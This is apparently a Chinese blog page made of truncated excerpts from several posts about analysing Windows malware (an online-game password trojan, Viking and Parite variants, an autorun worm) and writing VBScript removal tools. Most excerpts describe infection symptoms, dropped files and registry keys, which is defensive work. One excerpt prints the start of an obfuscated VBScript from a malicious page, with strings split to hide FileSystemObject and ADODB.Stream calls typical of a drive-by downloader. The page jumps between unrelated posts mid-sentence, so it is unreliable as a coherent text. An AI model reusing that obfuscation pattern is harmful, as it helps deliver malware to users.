接着Trojan-PSW.Win32.OnlineGames.kw病毒分析，我写了相关的专杀，此专杀最好在安全模式下进行。否则你还没杀完毒电脑就又重启了，并且此毒在电脑再次启动时会有许多不确定因素出现，比如一些新的病毒进程出现（它们互相保护着）。从上面的病毒分析报告中就可以看出电脑在启动时将加载至少八个病毒文件。所以强烈建议在安全模式下杀毒！

关于此专杀的一些说明：

Trojan-PSW.Win32.OnlineGames.kw盗号木马还真是可恶至极！看我下面的简单分析：

中毒症状：进程中有cmd.exe与IEXPLORE.EXE（不是你自己打开的），cmd.exe进程占用很大的CPU百分率！系统日期被改为1987年，卡巴无法使用！并且重启电脑几分钟内电脑会又会自动重启（为什么？）

一、运行病毒后生成如下病毒文件：
%system32%\servet.exe
%system32%\Deleteme.bat
%system32%\AVG.exe
%system32%\CFTMON.exe
%system32%\INETINF.exe
%system32%\SMSSS.exe

我……有点激动，dikex、阿郎、小G！我终于碰到挂马的网站了……《银河系漫游指南》中的小概率事件终于成为神话！有必要的话明天写专杀……

<HTML><script language="VBScript">
husz="Sc"
nxfh="ri"
patc="pt"
dvmw="in"
jtaj="g."
nmmh="Fi"
fnjw="le"
ceyc="Sy"
xnvv="st"
pzyi="em"
wwhe="Ob"
uira="je"
slxb="ct"
aigm="Ad"
mimj="od"
ehop="b."
oicy="St"
sjqt="re"
ivvv="am"
aljj="Mi"
vecu="cr"
wcjc="os

今天又更新“病毒专杀VBS模板”了。

顺便将完整需要的信息打包上传到我的网盘上，提供下载：http://ycosxhack.ys168.com/，“病毒专杀”目录，文件名为“病毒专杀VBS模板.rar”。本无意闯进这个领域，可既然来了，就努力点……继续完善吧。

VC++扔在那箱子里都没继续……不过庆幸已经有很好的基础了。重新拿起，心里总觉得VC++会更加的符合我！大脑都要生锈了！

08.03.09最新更新：
miniK（VBS杀毒引擎）v1.0发布，详情。

自从发布了《写了款Worm.Win32.VB.fw病毒专杀》与《病毒rundll.exe专杀发布与

以下专杀源码针对《Autorun型新病毒rundll.exe分析》提到的病毒。

我已经有了自己的一套病毒专杀模版（VBS编写），完全原创。此模版我可以共享出来。大虾们就可以一笑而过了，毕竟这样的专杀相对于其他语言编写的有点“弱智”，其实我认为VBS写的专杀并不是不好，就连bat也可以写专杀。非要VC++、VB来写专杀吗？我感觉都一样！

目前[2007.4.25]此病毒能躲过诺顿与卡巴，其他杀软不知道。病毒关键词：autorun.inf、rundll.exe、rundll86.exe、rundll32.exe、rundll16.exe、npkpdb.dll、c_10083.nls、UTF-8.nls。

病毒名称：无
病毒类型：蠕虫（通过移动盘传播）
病毒MD5：1b39da7f36b4dbf142a513b74c0f7981
加壳类型：UPX壳

病毒行为：

1、病毒rundll.exe运

理学院的朋友送了我30多张黑防的光盘，还给了个黑防的VIP号，感动……于是这几天没事就随便看看，这些光盘的内容对我来说已经是有点过时了，不过工具好齐全！收益颇丰啊！黑防的光盘带木马、病毒之类的是再平常不过了，但是居然在教程压缩包里藏了一两只病毒……我就这样中招了，中了QQ冲击波我一点也不放在心上！但是居然中了一个感染型的病毒Virus.Win32.Parite.a号称“网页杀手变种”！我郁闷了，所有的exe、scr文件皆被感染……

从好友bark的论坛http://bark.5d6d.com/thread-5-1-1.html上拿到了病毒样本，发现其中的my.exe是威金的变种Worm.Win32.Viking.it！以前从没测试过威金……于是在影子系统里对其进行测试，可是它太狡猾了！

运行病毒my.exe后，创建文件：
%Temp%t95bb77.sys（sys文件是随机命名的）
%system32%\wincab.sys

创建注册表项：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\shiji
以此在电脑启动时来加载

在写了《Worm.Win32.VB.fw分析与清除方案》后，也没想到要写什么专杀，不过这些天好多同学都说中了这只病毒，我要是一个一个去解决，非忙死我不可！感染范围挺大的！我之前写了一篇《VBS编程打造自己的病毒专杀工具》 ，VBS相对来说熟悉点，所以这次就用VBS来写个专杀吧……

下面代码不懂的，请参考那篇介